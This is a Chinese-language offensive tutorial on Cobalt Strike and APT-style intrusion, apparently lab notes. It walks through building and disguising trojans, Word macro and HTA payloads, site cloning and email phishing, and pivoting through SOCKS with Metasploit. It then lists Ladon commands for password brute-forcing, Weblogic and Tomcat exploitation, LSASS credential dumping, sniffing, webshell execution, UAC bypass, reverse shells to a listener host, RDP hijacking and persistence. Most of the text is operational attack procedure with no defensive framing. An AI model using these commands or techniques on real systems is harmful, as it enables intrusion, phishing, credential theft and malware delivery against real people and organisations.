14.社会工程学和apt

apt可使用工具Cobalt Strike，cs主要用于内网渗透以及APT攻击。

1. cs使用

服务器端:kali（192.168.60.）
客户端:windows(192.168.60.17)

1.启动服务器端:
在安装目录下使用命令 ./teamserver ip 123456(密码)

image.png

2.连接客户端：

image.png

1.1 主机上线

1.选择监听器，创建payload

image.png

image.png

2.生成木马
选择攻击---生成木马---windows Executa... ,选择刚才设置的监听器。

image.png

3.将生成的exe文件放在靶机上。
可以使用软件安防文件捆绑器对两个exe文件进行捆绑和改变图标。

image.png

使用KilerRat可以将exe文件改变为其他后缀名的文件。

image.png

3.在靶机运行之后就可以在客户端查看并进行操作。

image.png

1.2 结合metesploit，反弹shell

使用cs3.14版本，客户端是cobaltstrike.bat
1.在kali中输入mafconsole,进入msf.并进行设置

image.png

2.在靶机中
使用Cobalt Strike创建一个windows/foreign/reverse_http的Listener。其中ip为Metasploit的ip地址，端口为Metasploit所监听的端口。

image.png

3.选择增加会话，之后就可以在kali上看到的会话信息。

image.png

建立会话：

image.png

1.3 office宏payload应用

1.在win7上安装office 2003,然后再cs客户端生成木马，并选择监听器。
选择攻击--生成后门--ms office...--选择监听器。并将生成的文件复制到靶机中。

image.png

2.打开office软件，把cs生成的代码放到word宏里。
一般是word默认禁用所有宏(在工具----宏--安全性--选择低)
，另外应用位置不要设置所有的活动模板和文档，建设应用在当前文档。

创建宏:

image.png

image.png

3.运行文档时可在cs客户端查看到新的会话。

image.png

1.4 https payload的应用

可以免查杀，做到开机自启动。

1.5 信息收集

网站短链接生成:https://tool.chinaz.com/tools/dwz.aspx
1.选择攻击---钓鱼攻击---信息收集

image.png

2.填写信息之后点击开始，将生成的url进行复制

image.png

3.打开短连接生成地址，将刚才复制的url进行短链接生成。

4.将生成的短链接进行访问，可在视图--应用信息，查看到访问的url信息。

image.png

可用于验证ssrf，csrf漏洞是否真实存在，通过查看点击链接之后在cs客户端查看应用信息，是否进行页面跳转。

1.6 hta网页挂马

1.先生成hta文件，选择攻击---生成后门---html Application....选择监听器，将method改为powershell。选择保存。

image.png

2.使用文件下载。并进行设置。

image.png

image.png

点击开始之后，evil.hta文件会自动上传到cs目录下的uploads文件夹下。

image.png

3.克隆网站，并进行设置。
攻击---钓鱼攻击--克隆网站。

image.png

http://192.168.60.67:1245/evil.hta

4.把生成的链接复制出来到浏览器。

image.png

下载文件运行之后，可以在web日志看到刚才输入的数据。

image.png

1.7 邮件钓鱼

1.点击攻击--邮件钓鱼，将下面内容填写完整。
mail server：填写的是发件人的账号，smtp授权码，端口等信息。

image.png

邮件内容是由邮箱中下载进行修改而来的。

image.png

在邮箱中开启smtp服务。

image.png

image.png

image.png

3.可以在收件箱看到刚才发送的邮件。

image.png

1.8 Socks代理应用(横向渗透)

本次实验需要三台虚拟机，kali(cs服务器端)，2007(60网段/0网段 ip192.168.0.2)、2010(0网段(192.168.0.3)，是被控制的机器，作为跳板攻击内网)
1.给2007系统添加一个网卡，并设置lan网段。

image.png

并设置第二张网卡IP是192.168.0.2
设置win10系统ip为192.168.0.3

2.设置cs客户端。设置代理端口。端口号为25172

image.png

2.查看已搭建的代理。并点击Tunnel 将点击之后生成的代码复制到msf中运行。这样就可以利用msf远程攻击192.168.0.3所在的主机。

image.png

3.利用msf模块直接攻击

image.png

1.8.2 设置kali的软件socks代理

1.可以开启socks4a代理，通过代理进行内网渗透
开启socks，可以通过命令，也可以通过右键Pivoting->SOCKS Server

beacon> socks 端口号
[+] started SOCKS4a server on: 2222
[+] host called home, sent: 16 bytes
然后vim /etc/proxychains.conf ，在文件末尾添加socks4代理服务器。
socks4 127.0.0.1 端口号
例子：
使用proxychains代理扫描内网主机 proxychains nmap -sP 192.168.183.0/24。
在使用的插件前都加上proxychains。

image.png

2.也可以在连接的主机上通过
设置 中转---Deploy vpn设置虚拟网卡就行内网渗透。

image.png

1.9 cs提权和内网渗透

需要在guthub上下载插件：
https://github.com/rsmudge/Elevatekit
https://github.com/k8gege/Aggressor
landon用法：http://k8gege.org/Ladon/

##### 001 多协议探测存活主机 （IP、机器名、MAC地址、制造商）

Ladon 192.168.1.8/24 OnlinePC

##### 002 多协议识别操作系统 （IP、机器名、操作系统版本、开放服务）

Ladon 192.168.1.8/24 OsScan

##### 003 扫描存活主机

Ladon 192.168.1.8/24 OnlineIP

##### 004 ICMP扫描存活主机

Ladon 192.168.1.8/24 Ping

##### 005 扫描SMB漏洞MS17010 （IP、机器名、漏洞编号、操作系统版本）

Ladon 192.168.1.8/24 MS17010

##### 006 SMBGhost漏洞检测 CVE-2020-0796 （IP、机器名、漏洞编号、操作系统版本）

Ladon 192.168.1.8/24 SMBGhost

##### []007 扫描Web信息/Http服务

Ladon 192.168.1.8/24 WebScan

##### []008 扫描C段站点URL域名

Ladon 192.168.1.8/24 UrlScan

##### 009 扫描C段站点URL域名

Ladon 192.168.1.8/24 SameWeb

##### 010 扫描子域名、二级域名

Ladon baidu.com SubDomain

##### 011 域名解析IP、主机名解析IP

Ladon baidu.com DomainIP Ladon baidu.com HostIP

#####012 域内机器信息获取

Ladon AdiDnsDump 192.168.1.8 （Domain IP）

##### 013 扫描C段端口、指定端口扫描

Ladon 192.168.1.8/24 PortScan Ladon 192.168.1.8 PortScan 80,445,3389

##### 014 扫描C段WEB以及CMS（75种Web指纹识别）

Ladon 192.168.1.8/24 WhatCMS

##### 015 扫描思科设备

Ladon 192.168.1.8/24 CiscoScan Ladon [http://192.168.1.8](http://192.168.1.8/) CiscoScan

##### [016 枚举Mssql数据库主机 （数据库IP、机器名、SQL版本）

Ladon EnumMssql

##### 017 枚举网络共享资源 （域、存活IP、共享路径）

Ladon EnumShare

##### 018 扫描LDAP服务器

Ladon 192.168.1.8/24 LdapScan

##### 019 扫描FTP服务器

Ladon 192.168.1.8/24 FtpScan

###暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆

密码爆破详解参考SSH：[http://k8gege.org/Ladon/sshscan.html](http://k8gege.org/Ladon/sshscan.html)

#####020 445端口 SMB密码爆破(Windows)

Ladon 192.168.1.8/24 SmbScan

#####021 135端口 Wmi密码爆破(Windowns)

Ladon 192.168.1.8/24 WmiScan

##### 022 389端口 LDAP服务器、AD域密码爆破(Windows)

Ladon 192.168.1.8/24 LdapScan

##### 023 5985端口 Winrm密码爆破(Windowns)

Ladon 192.168.1.8/24 WinrmScan.ini

##### 024 445端口 SMB NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 SmbHashScan

##### 025 135端口 Wmi NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 WmiHashScan

##### 026 22端口 SSH密码爆破(Linux)

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

##### 027 1433端口 Mssql数据库密码爆破

Ladon 192.168.1.8/24 MssqlScan

##### 028 1521端口 Oracle数据库密码爆破

Ladon 192.168.1.8/24 OracleScan

##### 029 3306端口 Mysql数据库密码爆破

Ladon 192.168.1.8/24 MysqlScan

##### 030 7001端口 Weblogic后台密码爆破

Ladon [http://192.168.1.8:7001/console](http://192.168.1.8:7001/console) WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

##### [031 5900端口 VNC远程桌面密码爆破

Ladon 192.168.1.8/24 VncScan

##### 032 21端口 Ftp服务器密码爆破

Ladon 192.168.1.8/24 FtpScan

#####033 8080端口 Tomcat后台登陆密码爆破

Ladon 192.168.1.8/24 TomcatScan Ladon [http://192.168.1.8:8080/manage](http://192.168.1.8:8080/manage) TomcatScan

##### 034 Web端口 401基础认证密码爆破

Ladon [http://192.168.1.8/login](http://192.168.1.8/login) HttpBasicScan

##### 035 445端口 Impacket SMB密码爆破(Windowns)

Ladon 192.168.1.8/24 SmbScan.ini

##### 036 445端口 IPC密码爆破(Windowns)

Ladon 192.168.1.8/24 IpcScan.ini

### []漏洞检测/漏洞利用/Poc/Exp

##### [](https://github.com/k8gege/Aggressor#037-smb%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8Bcve-2017-0143cve-2017-0144)037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)

Ladon 192.168.1.8/24 MS17010

#####038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)

Ladon 192.168.1.8/24 WeblogicPoc

#####039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)

Ladon 192.168.1.8/24 PhpStudyPoc

##### 040 ActiveMQ漏洞检测(CVE-2016-3088)

Ladon 192.168.1.8/24 ActivemqPoc

#####041 Tomcat漏洞检测(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatPoc

##### 042 Weblogic漏洞利用(CVE-2019-2725)

Ladon 192.168.1.8/24 WeblogicExp

##### 043 Tomcat漏洞利用(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatExp

##### 044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

Ladon 192.168.1.8/24 Struts2Poc

### FTP下载、HTTP下载

##### 045 HTTP下载

Ladon HttpDownLoad [http://k8gege.org/Download/Ladon.rar](http://k8gege.org/Download/Ladon.rar)

##### 046 Ftp下载

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

### 加密解密(HEX/Base64)

##### 047 Hex加密解密

Ladon 123456 EnHex Ladon 313233343536 DeHex

##### [](https://github.com/k8gege/Aggressor#048-base64%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86)048 Base64加密解密

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64

### 网络嗅探

##### 049 Ftp密码嗅探

Ladon FtpSniffer 192.168.1.5

##### 050 HTTP密码嗅探

Ladon HTTPSniffer 192.168.1.5

##### 051 网络嗅探

Ladon Sniffer

###密码读取

##### 052 读取IIS站点密码、网站路径

Ladon IISpwd

##### DumpLsass内存密码

Ladon DumpLsass

### 信息收集

#####053 进程详细信息

Ladon EnumProcess Ladon Tasklist

#####054 获取命令行参数

Ladon cmdline Ladon cmdline cmd.exe

#####055 获取渗透基础信息

Ladon GetInfo Ladon GetInfo2

##### 056 .NET & PowerShell版本

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

##### 057 运行时版本&编译环境

Ladon Ver Ladon Version

### 远程执行(psexec/wmiexec/atexec/sshexec)

#####445端口 PSEXEC远程执行命令（交互式）

net user \192.168.1.8 k8gege520 /user:k8gege Ladon psexec 192.168.1.8 psexec> whoami nt authority\system

##### 058 135端口 WmiExec远程执行命令 （非交互式）

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

##### 059 445端口 AtExec远程执行命令（非交互式）

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

#####060 22端口 SshExec远程执行命令（非交互式）

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

##### 061 JspShell远程执行命令（非交互式）

Usage：Ladon JspShell type url pwd cmd Example: Ladon JspShell ua [http://192.168.1.8/shell.jsp](http://192.168.1.8/shell.jsp) Ladon whoami

#### 062 WebShell远程执行命令（非交互式）

source-shell
Usage：Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami


### 提权降权

##### 063 BypassUac 绕过UAC执行,支持Win7-Win10

Ladon BypassUac c:\1.exe Ladon BypassUac c:\1.bat

##### 064 GetSystem 提权或降权运行程序

Ladon GetSystem cmd.exe Ladon GetSystem cmd.exe explorer

##### 065 Runas 模拟用户执行命令

Ladon Runas user pass cmd

### 其它功能

#####066 一键启用.net 3.5

Ladon EnableDotNet

##### 067 获取内网站点HTML源码

Ladon gethtml [http://192.168.1.1](http://192.168.1.1/)

#####068 检测后门

Ladon CheckDoor Ladon AutoRun

##### 069 获取本机内网IP与外网IP

Ladon GetIP

##### 070 一键迷你WEB服务器

Ladon WebSer 80 Ladon web 80

### []反弹Shell

##### 071 反弹TCP NC Shell

Ladon ReverseTcp 192.168.1.8 4444 nc

##### 072 反弹TCP MSF Shell

Ladon ReverseTcp 192.168.1.8 4444 shell

##### 073 反弹TCP MSF MET Shell

Ladon ReverseTcp 192.168.1.8 4444 meter

##### 074 反弹HTTP MSF MET Shell

Ladon ReverseHttp 192.168.1.8 4444

#####075 反弹HTTPS MSF MET Shell

Ladon ReverseHttps 192.168.1.8 4444

##### 076 反弹TCP CMD & PowerShell Shell

Ladon PowerCat -r 192.168.1.8 4444 cmd Ladon PowerCat -r 192.168.1.8 4444 psh

##### 077 反弹UDP Cmd & PowerShell Shell

Ladon PowerCat -r 192.168.1.110 4444 cmd -u Ladon PowerCat -r 192.168.1.8 4444 psh -u

##### 078 RDP桌面会话劫持（无需密码）

Ladon RDPHijack 3 Ladon RDPHijack 3 console

##### 079 OXID定位多网卡主机

Ladon 192.168.1.8/24 EthScan Ladon 192.168.1.8/24 OxidScan

#### 080 查看用户最近访问文件

Ladon Recent

#### 081 添加注册表Run启动项

Ladon RegAuto Test c:\123.exe

####082 AT计划执行程序(无需时间)(system权限)

Ladon at c:\123.exe Ladon at c:\123.exe gui

#### 083 SC服务加启动项&执行程序(system权限）

Ladon sc c:\123.exe Ladon sc c:\123.exe gui Ladon sc c:\123.exe auto ServerName

1.安装插件，选择脚本管理器---load.

image.png

加载之后再选择提权，重新选择exploit。就可以进行提权。

image.png